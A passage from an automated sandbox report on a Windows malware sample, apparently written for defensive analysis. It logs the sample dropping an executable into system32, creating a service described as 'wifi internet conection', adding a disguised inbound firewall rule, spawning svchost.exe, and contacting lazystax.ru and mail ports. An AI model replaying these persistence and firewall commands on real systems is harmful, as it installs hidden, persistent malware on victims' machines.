00000000-00004968)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\jfnxeyae\\\" - (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\npkqjwg.exe\" %WINDIR%\\system32\\jfnxeyae\\\" - (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create jfnxeyae binPath= \"%WINDIR%\\system32\\jfnxeyae\\npkqjwg.exe /d\\\"C:\\eb12f84dc119300392e661b5b9a\" - (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description jfnxeyae \"wifi internet conection\"\" - (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start jfnxeyae\" - (UID: 00000000-00004968)\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00004968)\n \"npkqjwg.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00001776)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 766C0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 766C0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 766C0000\n \"npkqjwg.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 766C0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 766C0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 766C0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-275", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a named pipe", "description": "\"svchost.exe\" called \"CreateNamedPipeA\" with parameter \"\\\\.\\pipe\\uqyipjlp\"\n dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\npkqjwg.exe\" %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00004296)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"npkqjwg.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"npkqjwg.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00000868)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\npkqjwg.exe\" %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00004296)\n Spawned process \"sc.exe\" with commandline \"create jfnxeyae binPath= \"%WINDIR%\\\\system32\\\\jfnxeyae\\\\npkqjwg. ...\" (UID: 00000000-00000348), Spawned process \"sc.exe\" with commandline \"description jfnxeyae \"wifi internet conection\"\" (UID: 00000000-00005132), Spawned process \"sc.exe\" with commandline \"start jfnxeyae\" (UID: 00000000-00001952), Spawned process \"npkqjwg.exe\" with commandline \"/d\"C:\\\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9 ...\" (UID: 00000000-00001776)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005100), Spawned process \"svchost.exe\" (UID: 00000000-00005656)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00000868)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\npkqjwg.exe\" %WINDIR%\\\\system32\\\\jfnxeyae\\\\\" (UID: 00000000-00004296)\n Spawned process \"sc.exe\" with commandline \"create jfnxeyae binPath= \"%WINDIR%\\\\system32\\\\jfnxeyae\\\\npkqjwg. ...\" (UID: 00000000-00000348), Spawned process \"sc.exe\" with commandline \"description jfnxeyae \"wifi internet conection\"\" (UID: 00000000-00005132), Spawned process \"sc.exe\" with commandline \"start jfnxeyae\" (UID: 00000000-00001952), Spawned process \"npkqjwg.exe\" with commandline \"/d\"C:\\\\eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9 ...\" (UID: 00000000-00001776)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00005100), Spawned process \"svchost.exe\" (UID: 00000000-00005656)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"\n \"microsoft.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"npkqjwg.exe\" (UID: 00000000-00001776) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"npkqjwg.exe\" (UID: 00000000-00001776) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00005100) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00005100) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005656) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00005656) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"npkqjwg.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"npkqjwg.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"npkqjwg.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has an executable section named \".text\"\n \"npkqjwg.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has an writable section named \".data\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has an writable section named \".text\"\n \"npkqjwg.exe\" has an writable section named \".data\"\n \"npkqjwg.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xe9f000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xc1b000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"npkqjwg.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\npkqjwg.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"\n \"RasPbFile\"\n \"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75180000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74D40000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00005656)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"npkqjwg.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"npkqjwg.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"npkqjwg.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\npkqjwg.exe]- [targetUID: 00000000-00004968]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7\" was detected as \"VC8 -> Microsoft Corporation\"\n \"npkqjwg.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"npkqjwg.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"eb12f84dc119300392e661b5b9aefe380bace7ba5da9f7bf11eac63d9c801ee7.exe\" trying to touch file 